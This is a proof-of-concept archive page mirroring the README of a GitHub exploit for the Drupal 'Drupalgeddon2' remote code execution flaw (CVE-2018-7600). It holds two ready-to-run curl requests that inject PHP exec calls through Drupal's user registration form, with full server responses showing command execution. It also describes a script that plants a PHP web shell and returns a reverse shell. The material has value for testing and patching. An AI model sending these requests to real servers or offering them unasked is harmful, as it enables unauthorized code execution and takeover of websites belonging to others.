Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2018-7600 PoC — Drupal 安全漏洞

Source
https://github.com/ruthvikvegunta/Drupalgeddon2
Associated Vulnerability
Title:Drupal 安全漏洞 (CVE-2018-7600)
Description:Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code because of an issue affecting multiple subsystems with default or common module configurations.
Description
CVE-2018-7600 | Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' RCE
Readme
# CVE-2018-7600 | Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' RCE (SA-CORE-2018-002)

### Inspired from https://github.com/dreadlocked/Drupalgeddon2
- - -

Supports:
- Drupal **< 8.3.9** / **< 8.4.6** / **< 8.5.1** ~ `user/register` URL, attacking `account/mail` & `#post_render` parameter, using PHP's `passthru` function
- [Pending] [Yet to be Coded] Drupal **< 7.58** ~ `user/password` URL, attacking `triggering_element_name` form & `#post_render` parameter, using PHP's `passthru` function
- Uploads a **PHP shell** to the web root (`./`), and starts a netcat listener and it'll trigger the payload in a different thread and it'll return the rev shell to the user.
- Support **Linux** targets
- **Auto detects Drupal 7 or Drupal 8**


### PoC #1 - #post_render / account/mail / exec
- It uses the `user/register` URL, `#post_render` parameter, targeting `account/mail`, using PHP's `exec` function.

```
  curl -k -i 'http://localhost/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax' \
    --data 'form_id=user_register_form&_drupal_ajax=1&mail[a][#post_render][]=exec&mail[a][#type]=markup&mail[a][#markup]=uname -a'
```

The server will give 200 response & display JSON.
It **IS** able to render the output in the response _(such as doing uname -a)_.

**Example**

```bash
[g0tmi1k@attacker]$ curl -k -i 'http://localhost/drupal-8.4.5/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax' \
  --data 'form_id=user_register_form&_drupal_ajax=1&mail[a][#post_render][]=exec&mail[a][#type]=markup&mail[a][#markup]=uname -a'
HTTP/1.1 200 OK
Date: Wed, 18 Apr 2018 15:56:29 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.24
Cache-Control: must-revalidate, no-cache, private
X-UA-Compatible: IE=edge
Content-language: en
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Expires: Sun, 19 Nov 1978 05:00:00 GMT
X-Generator: Drupal 8 (https://www.drupal.org)
X-Drupal-Ajax-Token: 1
Content-Length: 280
Content-Type: application/json

[{"command":"insert","method":"replaceWith","selector":null,"data":"Linux ubuntu140045x64-drupal 3.13.0-144-generic #193-Ubuntu SMP Thu Mar 15 17:03:53 UTC 2018 x86_64 x86_64 x86_64 GNU\/Linux\u003Cspan class=\u0022ajax-new-content\u0022\u003E\u003C\/span\u003E","settings":null}]
[g0tmi1k@attacker]$
```

- - -

### PoC #2 - #lazy_builder / timezone/timezone / exec
- It uses the `user/register` URL, `#lazy_builder` parameter, targeting `timezone/timezone`, using PHP's `exec` function.

```
  curl -k -i 'http://localhost/user/register?element_parents=timezone/timezone/%23value&ajax_form=1&_wrapper_format=drupal_ajax' \
    --data 'form_id=user_register_form&_drupal_ajax=1&timezone[a][#lazy_builder][]=exec&timezone[a][#lazy_builder][][]=touch+/tmp/2'
```

The server will give 500 response & display "The website encountered an unexpected error. Please try again later".
It is **NOT** able to render the output in the response _(Blind!)_.

**Example**

```bash
[g0tmi1k@attacker]$ curl -k -i 'http://localhost/drupal-8.4.5/user/register?element_parents=timezone/timezone/%23value&ajax_form=1&_wrapper_format=drupal_ajax' \
    --data 'form_id=user_register_form&_drupal_ajax=1&timezone[a][#lazy_builder][]=exec&timezone[a][#lazy_builder][][]=touch+/tmp/2'
HTTP/1.0 500 500 Service unavailable (with message)
Date: Wed, 18 Apr 2018 15:58:04 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.24
Cache-Control: no-cache, private
Content-Length: 74
Connection: close
Content-Type: text/html

The website encountered an unexpected error. Please try again later.<br />
[g0tmi1k@attacker]$


root@ubuntu140045x64-drupal:~# stat /tmp/2
  File: '/tmp/2'
  Size: 0         	Blocks: 0          IO Block: 4096   regular empty file
Device: fd01h/64769d	Inode: 59488       Links: 1
Access: (0644/-rw-r--r--)  Uid: (   33/www-data)   Gid: (   33/www-data)
Access: 2018-04-18 15:58:05.061898957 +0000
Modify: 2018-04-18 15:58:05.061898957 +0000
Change: 2018-04-18 15:58:05.061898957 +0000
 Birth: -
root@ubuntu140045x64-drupal:~#
```

- - -

### Script Usage:
#### Tested on Drupal 8, Drupal 7 part of the exploit is yet to be coded
`python3 drupalgeddon2.py -t http://xxx.xxx.xxx.xxx -l xxx.xxx.xxx.xxx -p xxxx`

![](https://github.com/ruthvikvegunta/Drupalgeddon2/blob/master/images/drupalgeddon2.png)
File Snapshot

 [4.0K]  /data/pocs/0bb0c7933036ab16859b56e8edf58f054417fc87
├── [ 14K]  drupalgeddon2.py
├── [4.0K]  images
│   └── [237K]  drupalgeddon2.png
├── [ 34K]  LICENSE
└── [4.3K]  README.md

1 directory, 4 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →